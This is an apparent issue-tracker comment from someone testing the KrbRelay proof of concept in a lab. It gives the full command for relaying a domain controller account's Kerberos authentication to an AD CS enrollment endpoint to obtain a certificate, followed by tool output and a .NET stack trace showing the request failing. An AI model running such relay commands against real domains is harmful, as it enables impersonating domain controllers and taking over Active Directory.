Thanks for creating the POC. I'm just trying it out in my lab and I am running into the following problem. Maybe you ran into the same problem? Otherwise I'll let you know when I find the mistake or the solution.
The CSR is correct.
C:\tmp\KrbRelay>krbRelay.exe -spn http/ca.domain.ch -redirecthost ca1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs sancert -listenerport 445 -relayeduser dc01$ -redirectserver 192.168.12.202
[*] Socket Server Start: 445
[*] Client connected: [::ffff:192.168.12.101]:51355
[*] sending smbNegotiateProtocolResponse
[*] sending smb2NegotiateProtocolResponse
[*] Got AP-REQ for : http
[+] HTTP session established
[*] Subject: CN=\\dc01$
[*] CSR Request:
-----BEGIN+CERTIFICATE+REQUEST-----MIIEWDCCAk...-----END+CERTIFICATE+REQUEST-----
[*] Requesting certificate
[*] Testing: sancert
[-] System.AggregateException: One or more errors occurred. ---> System.Net.Http.HttpRequestException: Error while copying content to a stream. ---> System.IO.IOException: Unable to read data from the transport connection: An established connection was aborted by the software in your host machine. ---> System.Net.Sockets.SocketException: An established connection was aborted by the software in your host machine
at System.Net.Sockets.Socket.BeginReceive(Byte[] buffer, Int32 offset, Int32 size, SocketFlags socketFlags, AsyncCallback callback, Object state)
at System.Net.Sockets.NetworkStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
--- End of inner exception stack trace ---
at System.Net.Sockets.NetworkStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.ConnectStream.BeginReadWithoutValidation(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.ConnectStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.Http.HttpClientHandler.WebExceptionWrapperStream.BeginRead(Byte[] buffer, Int32 offset, Int32 count, AsyncCallback callback, Object state)
at System.Net.Http.StreamToStreamCopy.StartRead()
--- End of inner exception stack trace ---
--- End of inner exception stack trace ---
at System.Threading.Tasks.Task`1.GetResultCore(Boolean waitCompletionNotification)
at KrbRelay.Clients.Attacks.Http.ADCS.requestCertificate(HttpClient httpClient, String user, String domain, String template)
at KrbRelay.Clients.Http.Connect()
---> (Inner Exception #0) System.Net.Http.HttpRequestException: Error while copying content to a stream. ---> System.IO.IOException: Unable to read data from the transport connection: An established connection was aborted by the software in your host machine. ---> System.Net.Sockets.SocketException: An established connection was aborted by the software in your host machine
at System.Net.Sockets.Socket.BeginReceive(Byte[] buffer, Int32 offset, Int32 size, SocketFlags socketFlags, AsyncCallback callback, Object state)
at System.Net.Sockets.NetworkStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
--- End of inner exception stack trace ---
at System.Net.Sockets.NetworkStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.ConnectStream.BeginReadWithoutValidation(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.ConnectStream.BeginRead(Byte[] buffer, Int32 offset, Int32 size, AsyncCallback callback, Object state)
at System.Net.Http.HttpClientHandler.WebExceptionWrapperStream.BeginRead(Byte[] buffer, Int32 offset, Int32 count, AsyncCallback callback, Object state)
at System.Net.Http.StreamToStreamCopy.StartRead()
--- End of inner exception stack trace ---<---
It's not a timing issue; I tried: httpClient = new HttpClient(handler) { Timeout = TimeSpan.FromMinutes(2) };
Thank you